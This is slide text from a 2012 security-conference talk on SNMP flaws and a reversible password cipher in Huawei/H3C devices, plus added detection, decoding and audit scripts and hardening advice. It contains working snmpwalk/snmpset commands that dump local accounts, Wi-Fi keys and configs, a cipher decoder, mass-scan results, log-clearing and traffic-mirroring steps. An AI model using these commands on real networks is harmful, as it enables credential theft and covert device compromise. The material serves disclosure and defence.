A CouNtry's Honerable n3twork deviCes

A discussion on the weaknesses of SNMP and the password cipher used in Huawei and HP/H3C devices. Presented at BayThreat 3 (2012) on December 7, 2012.

  1. A CouNtrys Honorable n3twork deviCes
     Bay Threat 2012, @grutz
     BayThreat 2012 -- @grutz   A CouNtry's Honorable n3twork deviCes
  2. BACKGROUND
  3. Disclaimer
     Any content or opinion stated herein is that of myself and not of my employer. The information is being provided "as-is" and as a convenience, for informational purposes only. Any resemblance to real persons, living or dead, is purely coincidental. No warranty is expressed or implied. Not responsible for direct, indirect, incidental or consequential damages resulting from any defect, error or failure to perform. For recreational use only. May be too intense for some viewers.
  4. POLITICS!
     This presentation does not care about the politics between China, the US and any companies.
     Data is presented to show the pervasive risk these new vulnerabilities create.
     China was only used because they have the largest install base of Huawei and H3C equipment available via the Internet!
  5. About @grutz...
     Penetration tester
     In the business of breaking into businesses
  6. The Huawei/H3C/HP Timeline
     2006: Huawei-3Com partnership
     May 7, 2007: H3C is born!
     Sep 28, 2007: Bain Capital / Huawei / 3Com deal
     2008: US Gov't smackdown
     April 12, 2010: HP acquires H3C
     Oct 8, 2012: US Gov't Huawei/ZTE smackdown
  7. Huawei != H3C ...except when they are (software)
     Since the creation of H3C by Huawei-3Com the two companies diverged their product lines. Yet they still shared a very similar code origin (and bugs!)
     Vulnerabilities described here and in FX's talk can generally affect Huawei devices in the Huawei-3Com years (2006-2010) and all H3C devices
  8. FX's Huawei DEFCON Bomb
  9. Huawei's July 31, 2012 Response to c|net
     http://news.cnet.com/8301-1009_3-57482813-83/expert-huawei-routers-are-riddled-with-vulnerabilities/
  10. LET'S TALK BIG BANG
  11. Overflows are cool...
     ...but they're finicky little beasts. Huawei/H3C not as bad as Cisco IOS but, still..
     How many times have you used an IOS buffer overflow? No, really... Be serious here!
     Now how many times have you used SNMP to download device configs?
     Which would you rely upon for network penetration?
  12. h3c (old) vs hh3c (new)
     "For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style. By default, devices use H3C new-style MIB files;"
     http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228
  13. (T)FTP File Transfers: hh3c-config-man
     Function                 OID                                     Operator
     Operation type           1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx      1 - running2Startup, 2 - startup2Running, 3 - running2Net, 4 - net2Running, 5 - net2Startup, 6 - startup2Net
     Protocol                 1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx      1 - ftp, 2 - tftp, 3 - clusterftp, 4 - clustertftp
     Filename                 1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx      filename
     Destination IP Address   1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx      IpAddress
     Username                 1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx      FTP Username
     Password                 1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx      FTP Password
     RowStatus                1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx      4 - go go go move move move!
  14. hh3c-config-man caveats
     Support is spotty between device types: mostly routers and switches work
     H3C ERxxxx Series: OpType = 1 (system2net)
     Downloads are logged
     Requires Read/Write community string
     Buggy! Manual "snmpset" worked some of the time; Metasploit module worked some of the time
  15. Let's script...
     https://github.com/grutz/h3c-pt-tools/blob/master/hh3c-snmpdl.sh
  16. HP/H3C, SNMP, LOCAL ACCOUNTS AND YOU!
  17. Usernames and Passwords in SNMP? Never!
  18. Huawei/H3C Password Encryption Types
     (h)h3cAuthMode designates encryption storage type:
     0: No encryption
     3: Ciphertext "encryption", e.g. 7-CZB#/YX]KQ=^Q`MAF4<1!!
     9: SHA-256 encryption, $key$hash_digest_value (since 2007, mostly AR devices)
  19. hh3cUserLevel / hh3cUserState
  20. What is MAX-ACCESS and read-create?
     RFC-1902: SMI for SNMPv2
  21. ...so it's protected, right? Sure it is!
     Unless you know the SNMP READ ONLY string...
     This was probably a bug... or a misunderstanding...
  22. Let's glob some users!
     $ snmpwalk -c public -v 1 <host> 1.3.6.1.4.1.2011.10.2.12.1.1.1
     Walks the locally defined list of users:
     local user <username> password <clear|cipher|sha256> <value> level [0|1|2|3]
  23. Let's Weaponize it!
  24. Other SNMP goodies...
     (h)h3c-dot11-cfg (requires R/W access): SSID / PSKs
     snmpwalk -v 1 -c private ip-address 1.3.6.1.4.1.2011.10.2.75
     (h)h3c-ssh (requires R/W access): SSH server disabled? Enable it!
     snmpset -v 1 -c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1
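Added example, not from the talk or from h3c-pt-tools: a small Python classifier for SNMP requests, built from the OIDs quoted on slides 12, 13, 22 and 24, for a defender who wants to spot walks of the local-user table or writes to the config-transfer, dot11 and SSH objects in an agent log or a packet-capture decode. The record layout (src, version, community, pdu, oid) and the sample records are constructed for this example; the OID subtrees come from the slides, and the 2011.10 to 25506 prefix rewrite is the mapping slide 12 quotes from the H3C documentation.

```python
# Added example: flag SNMP requests that touch the Huawei/H3C subtrees the talk
# singles out. Record layout (src, version, community, pdu, oid) is constructed
# for this example; the OIDs are the ones quoted on the slides.

H3C_OLD = (1, 3, 6, 1, 4, 1, 2011, 10)  # compatible-style prefix (h3c-* MIBs)
H3C_NEW = (1, 3, 6, 1, 4, 1, 25506)     # new-style prefix (hh3c-* MIBs)


def parse_oid(text):
    """'1.3.6.1.4.1.25506.2.12' -> (1, 3, 6, 1, 4, 1, 25506, 2, 12)."""
    return tuple(int(arc) for arc in text.strip(". ").split("."))


def normalize(oid):
    """Rewrite the old 2011.10 prefix to 25506 so one rule covers both MIB styles
    (slide 12: the two trees name the same agent variables)."""
    if oid[:len(H3C_OLD)] == H3C_OLD:
        return H3C_NEW + oid[len(H3C_OLD):]
    return oid


def under(oid, subtree):
    """Arc-wise prefix test. A string prefix test would wrongly match
    ...25506.2.4 against ...25506.2.40.x; comparing tuples of ints does not."""
    return oid[:len(subtree)] == subtree


# Subtree (25506 style) and which PDU types are worth an alert there.
READS = {"get", "getnext", "getbulk"}
WATCH = {
    "config-man: config transfer row": (parse_oid("1.3.6.1.4.1.25506.2.4.1.2.4.1"), {"set"}),
    "user: local account table":       (parse_oid("1.3.6.1.4.1.25506.2.12.1.1.1"), READS | {"set"}),
    "dot11-cfg: SSID/PSK":             (parse_oid("1.3.6.1.4.1.25506.2.75"), READS | {"set"}),
    "ssh: server enable switch":       (parse_oid("1.3.6.1.4.1.25506.2.22.1.1.1.7"), {"set"}),
}


def classify(record):
    """Return the list of reasons a single SNMP request deserves attention."""
    oid = normalize(parse_oid(record["oid"]))
    reasons = [name for name, (subtree, pdus) in WATCH.items()
               if under(oid, subtree) and record["pdu"] in pdus]
    if record["version"] in ("1", "2c") and record["community"] in ("public", "private"):
        reasons.append("default community string")
    return reasons


def alerts(records):
    """(src, oid, reasons) for every record that triggers at least one reason."""
    out = []
    for rec in records:
        reasons = classify(rec)
        if reasons:
            out.append((rec["src"], rec["oid"], reasons))
    return out


# Constructed sample records (documentation-range addresses, made-up communities).
SAMPLE_RECORDS = [
    {"src": "203.0.113.9", "version": "1", "community": "public", "pdu": "getnext",
     "oid": "1.3.6.1.4.1.2011.10.2.12.1.1.1.1.2"},   # walking the old-style user table
    {"src": "203.0.113.9", "version": "2c", "community": "private", "pdu": "set",
     "oid": "1.3.6.1.4.1.25506.2.4.1.2.4.1.2.11"},   # hh3cCfgOperateType, row index 11
    {"src": "203.0.113.9", "version": "2c", "community": "private", "pdu": "set",
     "oid": "1.3.6.1.4.1.25506.2.22.1.1.1.7.0"},     # SSH server enable switch
    {"src": "192.0.2.5", "version": "2c", "community": "n0c-r0", "pdu": "get",
     "oid": "1.3.6.1.2.1.1.5.0"},                     # sysName: benign
    {"src": "192.0.2.5", "version": "2c", "community": "n0c-r0", "pdu": "get",
     "oid": "1.3.6.1.4.1.25506.2.40.1.1"},            # string-prefix trap: not config-man
]

if __name__ == "__main__":
    for src, oid, reasons in alerts(SAMPLE_RECORDS):
        print(f"{src} {oid}: {', '.join(reasons)}")
```

The last sample record is there for the string-prefix trap: "1.3.6.1.4.1.25506.2.4" is a textual prefix of "1.3.6.1.4.1.25506.2.40.1.1", so a rule written with str.startswith would fire on an unrelated object; comparing the OID arcs as integers avoids that.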
  25. Strap In and Let's Scan China!
  26. INCONCEIVABLE!
     http://www.okean.com/chinacidr.txt
     2,444 netblocks, 290,118,656 hosts
     Only care about SNMP: onesixtyone to the rescue!
     Originally by Solar Eclipse; updated in 2011 by Paul Flo Williams: https://github.com/hisdeedsaredust/onesixtyone
  27. L33t b@$h sk1ddy
     For best results use a VPS/host from a country China trusts
  28. (screenshot slide; no text extracted)
  29. China Network Device Counts (Oct 2012)
     Bar chart with an SNMP R/O series and an SNMP R/W series per vendor; values as labelled on the chart:
     Huawei / H3C: 117,033 and 88,517
     ZTE: 64,579 and 33,669
     Cisco: 11,278 and 2,475
     vxWorks: 8,121
     Juniper: 273 and 99
     Source: Personal scan of China netblock ranges using SNMP strings "public", "private", "h3c", "china" and "telecom"
  30. Compare H3C results from ShodanHQ
  31. (h)h3c-user Results
     Devices with locally defined accounts: 15,588
     Devices with ciphered passwords: 5,132
     Devices with cleartext passwords: 15,263
     Total accounts/passwords: 33,938
     Unique passwords: 3,898
     Username == Password: 2,101
     Unique version strings: 686
     A majority of cleartext-only passwords were from one Telecom company.
  32. What Type of Accounts are these?
     Local users can be used for: remote management access (telnet, ssh, web); VPN access
     In most cases telnet, ssh and http were open on devices with locally defined accounts.
  33. Device type breakdown
     Huawei/H3C VRP: 2,293
     SecPath/SecBlade Firewalls: 464
     WA2xxx Access Points: 2,771
     Huawei Quidway: 3,205
  34. SO ABOUT THAT CIPHER...
  35. Huawei/H3C Not Unique In This
     Weak and reversible ciphers seem to be a standard for all networking companies at one time: Cisco Type 7 (Vigenère cipher), Juniper $9$
     Generally these are used because some protocols need to use cleartext passwords yet these should not be stored in the clear.
     So....why not ROT13? Just as secure.......
  36. Cipher Examples
     CLEARTEXT                   CIPHER
     a                           D(HD%5.*MN;Q=^Q`MAF4<1!!
     aa                          P+J^5@ZGG[3Q=^Q`MAF4<1!!
     aaa                         +Q4Z3D_*-N[Q=^Q`MAF4<1!!
     123                         7-CZB#/YX]KQ=^Q`MAF4<1!!
     aaaa                        EHHC8L%9.F3Q=^Q`MAF4<1!!
     aaaaa                       X`9:NJ_A#$WQ=^Q`MAF4<1!!
     aaaaaa                      B.7)"^_<OGCQ=^Q`MAF4<1!!
     huawei                      N`C55QK<`=/Q=^Q`MAF4<1!!
     aaaaaaaa                    2P;JH_C3'+_Q=^Q`MAF4<1!!
     aaaaaaaaaaaaaaaaaaaa        2P;JH_C3'+^^KG@[*)9LZ*ZYF[R$:5M(0=0)*5WWQ=^Q`MAF4<<"TX$_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!
     aaaaaaaaaaaaaaaaaaaaaaaa    2P;JH_C3'+^^KG@[*)9LU<WK:`IEBCP2P;JH_C3+_Q=^Q`MAF4<<"TX$_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!
  37. Want more examples? jfgi!
  38. This means something...
     Ciphers are 24 or 88 chars in length
     '!!' at the end of everything
     Base64 rotational? Good idea, but no... didn't pan out.
     Consistent last few bytes of data: Q=^Q`MAF4<1!!
     Consistent first 10 bytes (2P;JH_C3'+) when the cleartext is >= 8 characters
  39. Probably using a block-based cipher
     Identical plaintext blocks encrypt to identical cipher blocks
  40. Binary/ASCII Encoding
     Let's assume DES-ECB: probably a static key; input = cleartext + null padding; output = binary data
     Binary result converted to printable ASCII. ASCII NOT Base64 but similar (4 chars to 3 bytes)
     A consistent cipher string length based on source length means we're probably correct.
  41. Let's decode to binary!
     def decode(cipher):
         # Undo the printable encoding: each character carries 6 bits (ord(c) - 33)
         # and four characters make up 3 bytes of binary data.
         # The slide's extraction dropped the quote characters around the two
         # literals below; the reading here is that an 'a' in the cipher stands
         # in for '?' (assumption: the encoder avoids emitting '?', the CLI help key).
         result = bytearray()
         chkval = ord('a')
         cipherlen = len(cipher)
         cipher_loc = 0
         # converter works in groups of 4 until cipherlen is reached
         for cnt in range(0, cipherlen, 4):
             cv2 = 0
             for group in range(4):  # groups 1-4 of the slide's unrolled code
                 cv1 = ord(cipher[cipher_loc])
                 if cv1 == chkval:
                     cv1 = ord('?')
                 cv2 = (cv2 << 6) | (cv1 - 33)
                 cipher_loc += 1
             # output: 24 bits -> 3 bytes
             result.append((cv2 & 0xff0000) >> 16)
             result.append((cv2 & 0xff00) >> 8)
             result.append(cv2 & 0xff)
         return result
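Added example, not from the talk or from h3c-pt-tools, covering slides 38 to 41: a compact re-implementation of the 4-chars-to-3-bytes decoding, applied to the cipher strings from slide 36 and then split into 8-byte blocks, so the block-cipher inference of slide 39 can be checked directly rather than eyeballed from the text. The 'a' for '?' substitution is carried over from the decoder as an assumption; the 18-byte result per 24-character cipher (16 bytes of ciphertext plus two zero bytes from the trailing '!!') is what the decoding yields, and the block size of 8 is the DES hypothesis of slide 40.

```python
# Added example: decode slide 36's cipher strings and compare them block by
# block. Shows that every cleartext of 8 characters or fewer produces the same
# second 8-byte block (the all-null padding block) while the first block differs.

ESCAPE = ord("a")  # assumption carried over from the decoder: 'a' in a cipher stands in for '?'


def decode_cipher(cipher):
    """Undo the printable encoding: 6 bits per character (ord - 33), 4 chars -> 3 bytes."""
    if len(cipher) % 4:
        raise ValueError("cipher length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(cipher), 4):
        val = 0
        for ch in cipher[i:i + 4]:
            code = ord("?") if ord(ch) == ESCAPE else ord(ch)
            sextet = code - 33
            if not 0 <= sextet < 64:
                raise ValueError(f"character {ch!r} is outside the 64-symbol alphabet")
            val = (val << 6) | sextet
        out += val.to_bytes(3, "big")
    return bytes(out)


def cipher_blocks(cipher, block_size=8):
    """Drop the zero bytes past the last whole block (24 chars -> 18 bytes -> 16)
    and split what remains into block_size-byte blocks."""
    raw = decode_cipher(cipher)
    aligned = len(raw) - len(raw) % block_size
    if any(raw[aligned:]):
        raise ValueError("expected only zero padding after the last whole block")
    return [raw[i:i + block_size] for i in range(0, aligned, block_size)]


# Cleartext -> cipher pairs copied from slide 36.
SAMPLES = {
    "a":      "D(HD%5.*MN;Q=^Q`MAF4<1!!",
    "aa":     "P+J^5@ZGG[3Q=^Q`MAF4<1!!",
    "aaa":    "+Q4Z3D_*-N[Q=^Q`MAF4<1!!",
    "123":    "7-CZB#/YX]KQ=^Q`MAF4<1!!",
    "aaaa":   "EHHC8L%9.F3Q=^Q`MAF4<1!!",
    "aaaaa":  "X`9:NJ_A#$WQ=^Q`MAF4<1!!",
    "aaaaaa": 'B.7)"^_<OGCQ=^Q`MAF4<1!!',
    "huawei": "N`C55QK<`=/Q=^Q`MAF4<1!!",
}


def summarize(samples):
    """(set of block counts per cipher, distinct first blocks, distinct second blocks)."""
    blocks = [cipher_blocks(c) for c in samples.values()]
    return ({len(b) for b in blocks},
            len({b[0] for b in blocks}),
            len({b[1] for b in blocks}))


if __name__ == "__main__":
    for clear, cipher in SAMPLES.items():
        print(f"{clear:8} " + " ".join(b.hex() for b in cipher_blocks(cipher)))
    print("block counts, distinct 1st, distinct 2nd:", summarize(SAMPLES))
```

Because the 6-bit groups do not line up with 8-byte blocks (a block boundary falls inside the eleventh character), identical blocks are only visible as identical characters from the twelfth character on, which is exactly the shared "Q=^Q`MAF4<1!!" tail the talk noticed; comparing the decoded bytes makes the whole second block match, not just its tail.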
  42. Huawei's Solution
     Use AES-256 and updated software for SNMP
     Yes.. AES-256.. A symmetric cipher.
     http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
  43. HP/H3C's Solution
     Use SHA-256 on those systems that support it
     Upgrade your code for the SNMP fix.
     https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685
  44. So about this SHA-256...
     Yeah, salted SHA-256. Not reversible but crackable!
     h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5
     pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
  45. NOW WHAT?
  46. Things to watch out for
     All commands are logged locally: > reset logbuffer
     Keyboard keys are very annoying: Backspace is not backspace, unless it's ^H
  47. See All Packets!!!
     <rtr1> system-view
     [rtr-1] interface tunnel 1/0/1
     [rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0
     [rtr-1-Tunnel1/0/1] tunnel-protocol gre
     [rtr-1-Tunnel1/0/1] source 10.10.1.1
     [rtr-1-Tunnel1/0/1] destination 192.168.1.1
     [rtr-1-Tunnel1/0/1] quit
     [rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1
     linux# modprobe ip_gre
     linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255
     linux# ip link set gre0 up
     linux# ip addr add 10.10.10.2/24 dev gre0
  48. PROTECT YOURSELF
  49. Be protected.. Be be protected!
     Don't configure local accounts, use RADIUS or TACACS+
     Don't configure SNMPv1
     Don't use default SNMP strings
     Disable the snmp view for (h)h3c-user:
       snmp-agent mib-view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1
       snmp-agent mib-view excluded 1.3.6.1.4.1.25506.2.12.1.1.1
     Use SHA256 passwords if your image supports it
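Added example, not from the talk or from h3c-pt-tools, covering the checklist on slide 49 together with the account formats of slides 18, 22 and 44 and the username == password count of slide 31: a Python audit that reads local-user lines in the one-line format slide 22 shows plus a few snmp-agent lines, and reports what the checklist would object to. The sample export and config are constructed (the one SHA-256 entry reuses the hash string from slide 44); the community and sys-info version line shapes are Comware syntax as I know it, and the mib-view parse takes the OID as the last token so that a line with or without a view name is accepted. Both of those are assumptions, not something the slides state.

```python
# Added example: audit exported local users and the SNMP agent config against
# the "Be protected" checklist. Input text is constructed; the h3c entry reuses
# the salted SHA-256 string shown on slide 44.
import re

USER_RE = re.compile(
    r"^local user (?P<name>\S+) password (?P<mode>clear|cipher|sha256) "
    r"(?P<value>\S+) level (?P<level>[0-3])$"
)
# Both OID styles of the user table (slide 49); both should be excluded from views.
USER_TABLE_OIDS = ("1.3.6.1.4.1.2011.10.2.12.1.1.1", "1.3.6.1.4.1.25506.2.12.1.1.1")
DEFAULT_COMMUNITIES = {"public", "private"}


def parse_users(export):
    """One dict per 'local user ...' line (the slide 22 output format)."""
    users = []
    for line in export.splitlines():
        m = USER_RE.match(line.strip())
        if m:
            users.append(m.groupdict())
    return users


def audit_users(users):
    findings = []
    if users:
        findings.append(f"{len(users)} local account(s) defined; prefer RADIUS/TACACS+")
    for u in users:
        if u["mode"] == "clear":
            findings.append(f"{u['name']}: cleartext password")
            if u["value"] == u["name"]:
                findings.append(f"{u['name']}: password equals username")
        elif u["mode"] == "cipher":
            findings.append(f"{u['name']}: reversible cipher storage; move to sha256")
        # sha256 entries raise nothing here: salted, not reversible (slide 44)
    return findings


def audit_snmp(config):
    findings = []
    excluded = set()
    for line in config.splitlines():
        p = line.split()
        if len(p) >= 4 and p[:2] == ["snmp-agent", "community"] and p[2] in ("read", "write"):
            if p[3] in DEFAULT_COMMUNITIES:
                findings.append(f"default community string '{p[3]}' ({p[2]})")
        elif p[:3] == ["snmp-agent", "sys-info", "version"] and ("v1" in p[3:] or "all" in p[3:]):
            findings.append("SNMPv1 enabled")
        elif p[:3] == ["snmp-agent", "mib-view", "excluded"] and len(p) >= 4:
            excluded.add(p[-1])  # assumption: OID tree is the last token, view name optional
    for oid in USER_TABLE_OIDS:
        if oid not in excluded:
            findings.append(f"user table {oid} not excluded from SNMP views")
    return findings


# Constructed sample export in the slide 22 format.
SAMPLE_EXPORT = """\
local user admin password cipher 7-CZB#/YX]KQ=^Q`MAF4<1!! level 3
local user backup password clear backup level 3
local user h3c password sha256 $eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5 level 3
local user noc password clear Summer2012 level 1
"""

# Constructed sample agent configuration.
SAMPLE_CONFIG = """\
snmp-agent
snmp-agent community read public
snmp-agent community write n0c-wr1te
snmp-agent sys-info version v1 v2c
snmp-agent mib-view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1
"""

if __name__ == "__main__":
    for finding in audit_users(parse_users(SAMPLE_EXPORT)) + audit_snmp(SAMPLE_CONFIG):
        print("-", finding)
```

The sample config excludes only the old-style OID, which is the mistake the audit is meant to catch: slide 12 says both trees expose the same variables, so a view that hides one and not the other still leaves the user table readable.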
  50. http://github.com/grutz/h3c-pt-tools/
     http://grutztopia.jingojango.net/
     Thanks to #metasploit, hdm, FX, eMaze (Ivan and Roberto), HP/H3C and Huawei IRTs, US-CERT and others whom I may have forgotten
     QUESTIONS?
